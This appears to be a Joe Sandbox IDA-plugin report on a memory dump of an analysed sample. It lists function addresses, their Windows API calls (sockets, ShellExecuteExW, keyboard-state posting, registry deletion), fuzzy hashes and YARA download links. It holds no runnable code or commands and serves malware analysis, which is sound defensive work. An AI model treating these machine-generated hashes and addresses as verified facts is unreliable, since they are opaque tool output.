Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 07186df18362c3cc82409d1d674b304a64d370614b6401644db8b21a22c4f440
Instruction ID: f795fdbde45d6d2504fe0aaa4518b52ba17bbb05d2da45b604a9f6f7701ebe72
Opcode Fuzzy Hash: 07186df18362c3cc82409d1d674b304a64d370614b6401644db8b21a22c4f440
Instruction Fuzzy Hash: C5C17E716083109FC724EF24D985A5AB7E4FF84314F10696DF89DAB2A2DB30ED45CB92

Function 00E96E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E96F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E96F35
WSAGetLastError.WSOCK32(00000000), ref: 00E96F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00E96FFE
inet_ntoa.WSOCK32(?), ref: 00E96FBB

Part of subcall function 00E7AE14: _strlen.LIBCMT ref: 00E7AE1E
Part of subcall function 00E7AE14: _memmove.LIBCMT ref: 00E7AE40

_strlen.LIBCMT ref: 00E97058
_memmove.LIBCMT ref: 00E970C1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 9b8c50ebf1687d15149ac8252b12f774b5b56116db63d3f6cdfa26c81225fd70
Instruction ID: 3e5e9fb537a61157e5ce5a75b5624e136f0205259ad15445bb2f2b002ac1029a
Opcode Fuzzy Hash: 9b8c50ebf1687d15149ac8252b12f774b5b56116db63d3f6cdfa26c81225fd70
Instruction Fuzzy Hash: DC81E171508310ABDB10EF24DC82E6FB7E9AF84718F14691DF555BB2A2DA70AD04CB92

Function 00E21424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade0095ff7328ae74df3e9c3b023d333c6b794db0638f8463b522a0afc8b33bb
Instruction ID: a6b1f8e0bbcee1622e6cc194faef4384e2c761828df8b8e9ecd2e94e899901eb
Opcode Fuzzy Hash: ade0095ff7328ae74df3e9c3b023d333c6b794db0638f8463b522a0afc8b33bb
Instruction Fuzzy Hash: F3717F31900129EFCB04DF98DC45ABEBBB9FF96314F148199F915BA251C734AB51CB60

Function 00EAB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(009E5EA0), ref: 00EAB6A5
IsWindowEnabled.USER32(009E5EA0), ref: 00EAB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EAB795
SendMessageW.USER32(009E5EA0,000000B0,?,?), ref: 00EAB7CC
IsDlgButtonChecked.USER32(?,?), ref: 00EAB809
GetWindowLongW.USER32(009E5EA0,000000EC), ref: 00EAB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EAB843

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 2321cf470f4640714b17850c07703a6370a03ab42bbee11b05830ff53b84d832
Instruction ID: edae09f70f4646dcad5bdcc6b544748ccb17b676159295f6f00a6f043b9460a8
Opcode Fuzzy Hash: 2321cf470f4640714b17850c07703a6370a03ab42bbee11b05830ff53b84d832
Instruction Fuzzy Hash: 9C71BD34600204AFDB249FA5C8A4FAA7BB9FF9F344F14516AF945BB262C771B841CB50

Function 00E9F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9F75C
_memset.LIBCMT ref: 00E9F825
ShellExecuteExW.SHELL32(?), ref: 00E9F86A

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

Part of subcall function 00E3FEC6: _wcscpy.LIBCMT ref: 00E3FEE9

GetProcessId.KERNEL32(00000000), ref: 00E9F8E1
CloseHandle.KERNEL32(00000000), ref: 00E9F910

Strings

@, xrefs: 00E9F839

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 29dff21d7df530509793ac3eabd930c77f6f67efcfe568b135ec28706c4733ad
Instruction ID: 215a66c8bea20477a049da380012863749b6f77e28e551af533bdd28e900e9b9
Opcode Fuzzy Hash: 29dff21d7df530509793ac3eabd930c77f6f67efcfe568b135ec28706c4733ad
Instruction Fuzzy Hash: 82618CB5A006299FCF14DFA4D5819AEBBF4FF48314F14A469E85ABB351CB31AD40CB90

Function 00E8145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00E8149C
GetKeyboardState.USER32(?), ref: 00E814B1
SetKeyboardState.USER32(?), ref: 00E81512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00E81540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00E8155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00E815A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E815C8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: dfdaef1a0bd28e5edd27902d07b5f3a317306edf1c183bb8787607fe3aafbf10
Instruction ID: 0091355b9cb744b12ba48df2455b9030f8c78d00245692d4da1ad0523920c3de
Opcode Fuzzy Hash: dfdaef1a0bd28e5edd27902d07b5f3a317306edf1c183bb8787607fe3aafbf10
Instruction Fuzzy Hash: D65102A0A047D53EFB3263748C45BBA7FED5B46308F0894C9E1DDA68C2D294EC86D750

Function 00E81276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00E812B5
GetKeyboardState.USER32(?), ref: 00E812CA
SetKeyboardState.USER32(?), ref: 00E8132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E81357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E81374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E813B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E813D9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2931e873f17da30f0c00aa11d851b571c31ad8cdcf4989f256db24ea243e7dc3
Instruction ID: efe1086dceb9e7aed54fa2141597c0928579bb410c74a70bafeeef75acf92d0d
Opcode Fuzzy Hash: 2931e873f17da30f0c00aa11d851b571c31ad8cdcf4989f256db24ea243e7dc3
Instruction Fuzzy Hash: E65106A05047D53DFB32A3248C45BBA7FAD5B07308F0894CDE1DCA68C2D395AC8AE750

Function 00E8589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00E858AC
_wcsncpy.LIBCMT ref: 00E858E1
_wcsncpy.LIBCMT ref: 00E85913
_wcsncpy.LIBCMT ref: 00E85946
_wcsncpy.LIBCMT ref: 00E85988
_wcsncpy.LIBCMT ref: 00E859C2
_wcsncpy.LIBCMT ref: 00E859F1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: a9acb5b7f725ba71c5a5fb5ccf3fe3a41c62e9d964c37f25cefe2922f05bda30
Instruction ID: 48da22e9bd7c75ce40869fb589de8c68d8d6445119eedc33aec3438579ddb253
Opcode Fuzzy Hash: a9acb5b7f725ba71c5a5fb5ccf3fe3a41c62e9d964c37f25cefe2922f05bda30
Instruction Fuzzy Hash: 504180A6C2051876CB11FBB5988AACFB3A8DF04310F50A956F518F3121FB34E714C7A9

Function 00E7DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E7DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E7DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E7DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E7DB8E

Strings

DllGetClassObject, xrefs: 00E7DB01
,,, xrefs: 00E7DA69

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,$DllGetClassObject
API String ID: 753597075-2867008933
Opcode ID: 16838bf99d790936071e2245c9ca4466c0d8ab1571804cd22d9b76556dd15974
Instruction ID: 99db915f44f21113abf1837fd2a6d28584c6af115e031c5adedc4b237b2512aa
Opcode Fuzzy Hash: 16838bf99d790936071e2245c9ca4466c0d8ab1571804cd22d9b76556dd15974
Instruction Fuzzy Hash: 6D418FB1604208EFDB15CF55CC84A9ABBB9EF48310F15D1AAED09AF206D7B1DD44CBA0

Function 00E838AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E838D3,?), ref: 00E848C7

Part of subcall function 00E848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E838D3,?), ref: 00E848E0

lstrcmpiW.KERNEL32(?,?), ref: 00E838F3
_wcscmp.LIBCMT ref: 00E8390F
MoveFileW.KERNEL32(?,?), ref: 00E83927
_wcscat.LIBCMT ref: 00E8396F
SHFileOperationW.SHELL32(?), ref: 00E839DB

Strings

\*.*, xrefs: 00E83969

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a35293c692932f4218de92d93256d68c1e48381a0940acb50e337508700ee1c8
Instruction ID: 1e2cb11671b36ff0b1d5fc8716aaca1a4f3c038b5fbbc33db1d729ae0a0bfea2
Opcode Fuzzy Hash: a35293c692932f4218de92d93256d68c1e48381a0940acb50e337508700ee1c8
Instruction Fuzzy Hash: 13417CB25083449AD752FF64D481ADBB7E8AF88740F40292EF48EE3161EA74D688C752

Function 00EA7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA75C0
IsMenu.USER32(?), ref: 00EA75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EA7620
DrawMenuBar.USER32 ref: 00EA7633

Strings

0, xrefs: 00EA750D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: bb59625af1c1df3f1cd84f5663f05eb59576f726b6a58331970ad83acb44a037
Instruction ID: ab1d39b837b15133c6908dad09d775933ca0a2866b19e48f9e20d7b11b81548e
Opcode Fuzzy Hash: bb59625af1c1df3f1cd84f5663f05eb59576f726b6a58331970ad83acb44a037
Instruction Fuzzy Hash: FA414570A04608EFDB20DF95D884E9ABBF8FB4A354F049129ED95AB250D730ED44CFA0

Function 00EA122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EA125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA1286
FreeLibrary.KERNEL32(00000000), ref: 00EA133D

Part of subcall function 00EA122D: RegCloseKey.ADVAPI32(?), ref: 00EA12A3
Part of subcall function 00EA122D: FreeLibrary.KERNEL32(?), ref: 00EA12F5
Part of subcall function 00EA122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EA1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00EA12E0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 74422ecf53d838f466f0dfcc6fea20c3569f731b9b57d1202256f6c859525710
Instruction ID: d5cae694f87e3bc60596bb01a4cc920e87c42fdfcb5fec4f36391594bc6e7305
Opcode Fuzzy Hash: 74422ecf53d838f466f0dfcc6fea20c3569f731b9b57d1202256f6c859525710
Instruction Fuzzy Hash: 51311AB1901109BFDB149FD1DC89AFEB7BCEF0E304F0011A9E501F6151EA74AE499AA4

Function 00EA653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EA655B
GetWindowLongW.USER32(009E5EA0,000000F0), ref: 00EA658E
GetWindowLongW.USER32(009E5EA0,000000F0), ref: 00EA65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EA65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EA661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00EA6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EA664A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ae75ce4e100803ffd5d64b58692afa2d433d67a8b5f26ed891c8a5cb3c191ecc
Instruction ID: cf160e9d62d639bafe82db31f4c2a1bf1b1a12a5bfaf6ad3941522f451f1aeab
Opcode Fuzzy Hash: ae75ce4e100803ffd5d64b58692afa2d433d67a8b5f26ed891c8a5cb3c191ecc
Instruction Fuzzy Hash: A8310230A04154AFDB20CF59DC88F5537E1BB9F358F1921A8F511AF2B5CB61B8449B81

Function 00E96486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E980CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E964D9
WSAGetLastError.WSOCK32(00000000), ref: 00E964E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E96521
connect.WSOCK32(00000000,?,00000010), ref: 00E9652A
WSAGetLastError.WSOCK32 ref: 00E96534
closesocket.WSOCK32(00000000), ref: 00E9655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E96576

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 03036b0813fe5298794d1741fd68869aadbe2a50b3ebc1be691c9659ad9ec6d1
Instruction ID: 52eb356451d8f02537e0efdb65e87f23e5b764f3943b5d7283adff535de29273
Opcode Fuzzy Hash: 03036b0813fe5298794d1741fd68869aadbe2a50b3ebc1be691c9659ad9ec6d1
Instruction Fuzzy Hash: C931B371600218AFDF109F64DC85BBE7BE8EB49724F01902AFD09B7291DB74AD48CB61

Function 00E7E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E7E120
SysAllocString.OLEAUT32(00000000), ref: 00E7E123
SysAllocString.OLEAUT32 ref: 00E7E144
SysFreeString.OLEAUT32 ref: 00E7E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00E7E167
SysAllocString.OLEAUT32(?), ref: 00E7E175

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2e0d390eae4fe9d20aca62d4505c970387f98f835d37cf80c560ceef1c237e3e
Instruction ID: 2212ec0186185de8f77178b315d8f4c0ab53fcca28ca65275d2ba27614308287
Opcode Fuzzy Hash: 2e0d390eae4fe9d20aca62d4505c970387f98f835d37cf80c560ceef1c237e3e
Instruction Fuzzy Hash: 00217135605108AFDB109FA9DC89CAB77ECEB0D760B50C175F919EB260DA70EC458B64

Function 00EA783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E21D73
Part of subcall function 00E21D35: GetStockObject.GDI32(00000011), ref: 00E21D87
Part of subcall function 00E21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E21D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EA78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EA78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EA78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EA78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EA78D4

Strings

Msctls_Progress32, xrefs: 00EA7872

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 4e7e43bc94533dce89c69518331e9a28bf56a136e89942833c39467814c50c11
Instruction ID: a17f6c6f2f64686d84c5ff46b12f2fac5a73d7c65b9dd24ede4779e1795e1dae
Opcode Fuzzy Hash: 4e7e43bc94533dce89c69518331e9a28bf56a136e89942833c39467814c50c11
Instruction Fuzzy Hash: DB117CB2110229BFEB159E60CC85EE77B6DEF097A8F015115BA44A6090C772AC21DBA0

Function 00E441C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E44292,?), ref: 00E441E3
